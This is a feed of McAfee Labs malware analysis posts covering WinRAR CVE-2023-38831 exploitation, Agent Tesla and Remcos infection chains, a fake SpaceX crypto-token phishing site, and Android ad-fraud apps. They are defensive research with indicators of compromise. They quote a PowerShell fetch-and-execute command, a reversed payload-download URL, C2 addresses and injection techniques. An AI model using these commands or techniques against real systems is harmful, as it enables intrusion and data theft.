Normal view

There are new articles available, click to refresh the page.
Before yesterdayMcAfee Blogs

Exploring Winrar Vulnerability (CVE-2023-38831)

19 September 2023 at 18:43

Authored by Neil Tyagi

On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.

Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)

  • The image below shows that the archive is named trading_system, which hints that it is used to target traders

  • We can also see that the threat actor can craft the archive so that folder and file names are the same.
  • This is interesting as Windows doesn’t allow files and folders to have the same name in the same path.
  • This shows that it was weaponized after creating a regular zip by changing the bytes to make the file and folder name the same.
  • Also, note there is a trailing space at the end of the file and folder name (in yellow).
  • When we look inside the folder, we see many files, but the most important file is highlighted, which is a bat file containing a malicious script.
  • The bat file also has the same name as the benign file outside the folder.

  • When we check the script, we see it launches cmd in the minimized state, then goes to the temp folder where WinRAR will extract the files, then tries to find the file, which is present inside the folder and executes it using wmic and then exits.
  • Checking we find that it is a CAB SFX file.
  • We extract it to check what is inside.
  • We found a PE file, some ActiveX control objects, and two text files.
  • AMD.exe is a visual basic compiled file whose main job is to extract the dll hidden in a blob of data inside pc.txt and execute the ActiveX controls.
  • Inside add.txt, we find the registry keys it will try to manipulate
  • The first control is responsible for registering a COM object in Windows. During registration, registry keys are imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is registered in the infected system. The default value of the InprocServer32 key is populated with the path to a malicious DLL named “Core.ocx”.
  • Wmic process executes

  • com executes AMD.exe
  • AMD.exe extracts the encrypted dll file inside pc.txt and writes it in the romaing\nvidia folder.

  • Here, we observe AMD.exe calls reg.exe on registry keys inside add.txt
  • Timeout is also called to slow down the activities of the infection chain.
  • AMD.exe Calls rundll32 on the clsid that is registered in the registry

  • We can see successful tcp connection to threat actors C2.( ip 37[.]120[.]158[.]229)

Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)

Infection chain

How does the vulnerability work?

  • Here, we will analyze the issue causing WinRAR to execute the script instead of opening the image.
  • We will compare how WinRAR behaves when we execute an image file from a weaponized zip vs. a normal zip. So we fire up ProcMon First.

  • The above image shows that the first logical bug is how WinRAR is extracting files in the temp folder before executing them. In the case of a regular zip, only the clean image file is extracted to the temp folder, whereas in the case of a weaponized zip, even the files present inside the folder are extracted to the temp folder along with the clean image file. This is due to the same file names we have given, which makes WinRAR extract those in temp.
  • Verifying the same in the temp folder

Normal Zip

Weaponized Zip

  • In Logs, when we dig deep, we can see Winrar searches for our filename with an *, which causes it to iterate over our bat file as it has the same name, which in turn gets executed.

  • To see what’s happening under the hood, we hook a debugger and launch WinRAR by manipulating the “image file Execution options” registry key.
  • When we execute the rar file, we see the debugger getting attached to the winrar process so that we can do just-in-time debugging.
  • We put a breakpoint on the ShellExecuteExW function to see what parameters are passed to it just after clicking the jpeg file.
  • When we double-click on the image file, we can see the debugger is opened, and after a few clicks, we hit our breakpoint.

Normal zip

  • In this case, the correct parameter is passed to the ShellExecuteExW function as the file exists at this exact path.

Weaponized zip

  • In this case, an incorrect parameter is passed to the ShellExecuteExW function as the parameter contains a trailing space, and such a file does not exist on the disk.
  • When we dig deep, we find that later, it calls PathUnquoteSpacesA API call, as per MSDN. It “Removes quotes from the beginning and end of a path.”
  • As quotes are removed from the end of the path, ShellExecuteExW executes “simple_image.jpg .cmd” instead of “simple_image.jpg.”


Sha256 Detection
bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa Trojan:Archive/2023_38831.NEAA



  • .( ip 37[.]120[.]158[.]229)
  • REG keys

  • File path



  • WinRAR users should immediately update to the latest version. WinRAR archiver, a powerful tool to process RAR and ZIP files (
  • Use a licensed and updated McAfee+ subscription to stay protected.
  • Stay informed about common cyber threats and tactics used by cybercriminals. This knowledge can help you recognize potential risks and avoid scams.
  • Be very cautious when dealing with attachments from unknown sources. Only run attachments that come from trusted sources.
  • Protect your accounts by using multi-factor authentication.

The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.

Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion

8 September 2023 at 15:47

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla on field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell..

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command


As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

  1. Downloading and decoding the final payload
  2. Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into: /castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:


Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

“kern!”.Replace(“!”, “el32”)  à  kernel32

Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx

As a result, these functions translate into the subsequent API calls:

  1. CreateProcessA : This API call is typically employed to initiate the creation of a new process, rather than for process injection. In the context of process injection, the focus is generally on targeting an existing process and injecting code into it.
  2. VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
  3. ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
  4. GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
  5. Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
  6. SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
  7. Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
  8. ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
  9. WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
  10. ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:


Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

  • Computer Name
  • IP information
  • Win32_baseboard
  • Serial number
  • win32_processor
  • processorID
  • Win32_NetworkAdapterConfiguration
  • MacAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients


Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.

Figure 24: Function calls made for exfiltration.

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

  1. A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

  1. Next, the malware retrieves the hostname of the email address it intends to utilize i.e.,

Figure 26: Domain retrieval

  1. Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

  1. Lastly, the password for that email address is provided, so that attacker can log in and can start sending out the data.

Figure 28: Password

The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.


The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

File MD5 SHA256
VBS file e2a4a40fe8c8823ed5a73cdc9a8fa9b9 e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5
JPEG file ec8dfde2126a937a65454323418e28da 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f
DLL file b257f83495996b9a79d174d60dc02caa b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f
Final payload dd94daef4081f63cf4751c3689045213 abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42

Table 1:Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.

Peeling Back the Layers of RemcosRat Malware

29 August 2023 at 17:00

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 


Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 


Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  

Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 


To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (, its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 


RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

SHA256  Filetype 
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67  VBS 
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c  PowerShell 
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4  MSIL loader 
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf  SykCrypter 
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517  Remcos Payload 

The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.

Crypto Scam: SpaceX Tokens for Sale

24 August 2023 at 13:19

Authored by: Neil Tyagi  

Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash. 

Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets. 

This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction. 

It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX. 

The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views) 

 Protection with McAfee+:  

McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites. 

The link present in this tweet redirects to  space[-]launch[.]net, which is already marked as malicious by McAfee. 

A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets. 

A WHOIS lookup on the domain reveals redacted personal information. No surprises there  

When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials. 


For people who don’t have SpaceX credentials, they can use the signup link.  


After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX


As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding. 

In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site. 

Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT. 


Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount

Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets. 

The crypto wallet addresses of scammers for the following currencies are.  

  • BTC bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
  • USDT 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
  • ETH 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 

Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account. 

Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars 

We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.  

Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices. 

IOC (Indicator of Compromise)  

Domain  Crypto Type  Wallet address 
space[-]launch[.]net  BTC  bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
space[-]launch[.]net  USDT  398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
space[-]launch[.]net  ETH  16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 
space[-]launch[.]net  XRP  rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF 
space[-]launch[.]net  DASH  XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1 
space[-]launch[.]net  BCH  qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68 
space[-]launch[.]net  USDC  0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 




The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.

Invisible Adware: Unveiling Ad Fraud Targeting Android Users

4 August 2023 at 13:36

Authored by SangRyol Ryu, McAfee Threat Researcher

We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?  

Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might initially seem convenient for users. However, it’s a clear violation of Google Play Developer policy on how ads should be displayed. This affects not only the advertisers who pay for invisible Ads, but also the users as it drains battery, consumes data and poses potential risks such as information leaks and disruption of user profiling caused by Clicker behavior. 

The team has identified 43 apps that collectively downloaded 2.5 million times. Among the targeted apps are TV/DMB Player, Music Downloader, News, and Calendar applications. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Most apps are no longer available on Google Play while others are updated by the developer. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security. 

Many affected apps

How does it work? 

This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect. 

Getting latent period by using Firebase Messaging Service 

It is important to be cautious about the implications of granting permissions, such as excluding ‘power saving’ and allowing ‘draw over other apps’. These permissions can enable certain activities to occur discreetly in the background, raising concerns about the intentions and behavior of the applications or libraries in question. Allowing these permissions can result in more malicious behavior, such as displaying phishing pages, also to displaying ads in the background. 

Asked permissions to run in the background and keep it hidden 

When the device screen is turned off after the latent period, the fetching and loading of ads starts, resulting in users being unaware of the presence of running advertisements on their devices. This ad library registers device information by accessing the unique domain (ex: linked with the application. Then go to Firebase Storage to get the specific advertisement URL and show the ads. It is important to note that this process consumes power and mobile data resources. 

Observed traffic when the screen off 

If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed. 

Example of an advertising site displayed when the screen is off 

In conclusion, it is essential for users to exercise caution and carefully evaluate the necessity of granting permissions like power saving exclusion, or draw over other apps before allowing them. While these permissions might be required for certain legitimate functionalities for running in the background, it is important to consider the potential risks linked with them, such as enabling hidden behaviors or reducing the relevance of ads and contents displayed to users because the hidden Clicker behavior. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. For more information, visit McAfee Mobile Security


Indicators of Compromise (IoC’s)


Android Packages 

Package Name  Application Name  SHA256  Google Play Downloads  DMB TV  f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1  10,000+  DMB TV  6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050  100,000+  DMB TV  a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537  10,000+  DMB TV  5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf  100,000+ 
kr.dmb.onair  DMB TV  e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8  5,000+  DMB TV  33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107  50,000+  DMB TV  a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769  100+ 
com.breakingnews.player  뉴스 속보  d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d  10,000+  달력  46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874  10,000+  뮤직다운  a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931  100,000+ 
com.musicdown  뮤직다운  5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16  5,000+  뮤직다운  397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66  100,000+  바로TV  3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919  10,000+  바로TV  760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe  50,000+  바로TV  b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c  10,000+ 
kr.baro.dmb  바로TV  84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765  100,000+  바로TV  cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc  1,000+  바로TV  c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf  50,000+  바로TV  6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9  10,000+ 
freemusic.ringtone.player  벨소리 무료다운  75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e  100,000+  실시간 TV  8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534  50,000+  실시간 TV  1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3  50,000+ 
eight.krdmb.onair  실시간 TV  bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79  10,000+  실시간 TV  5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79  10,000+ 
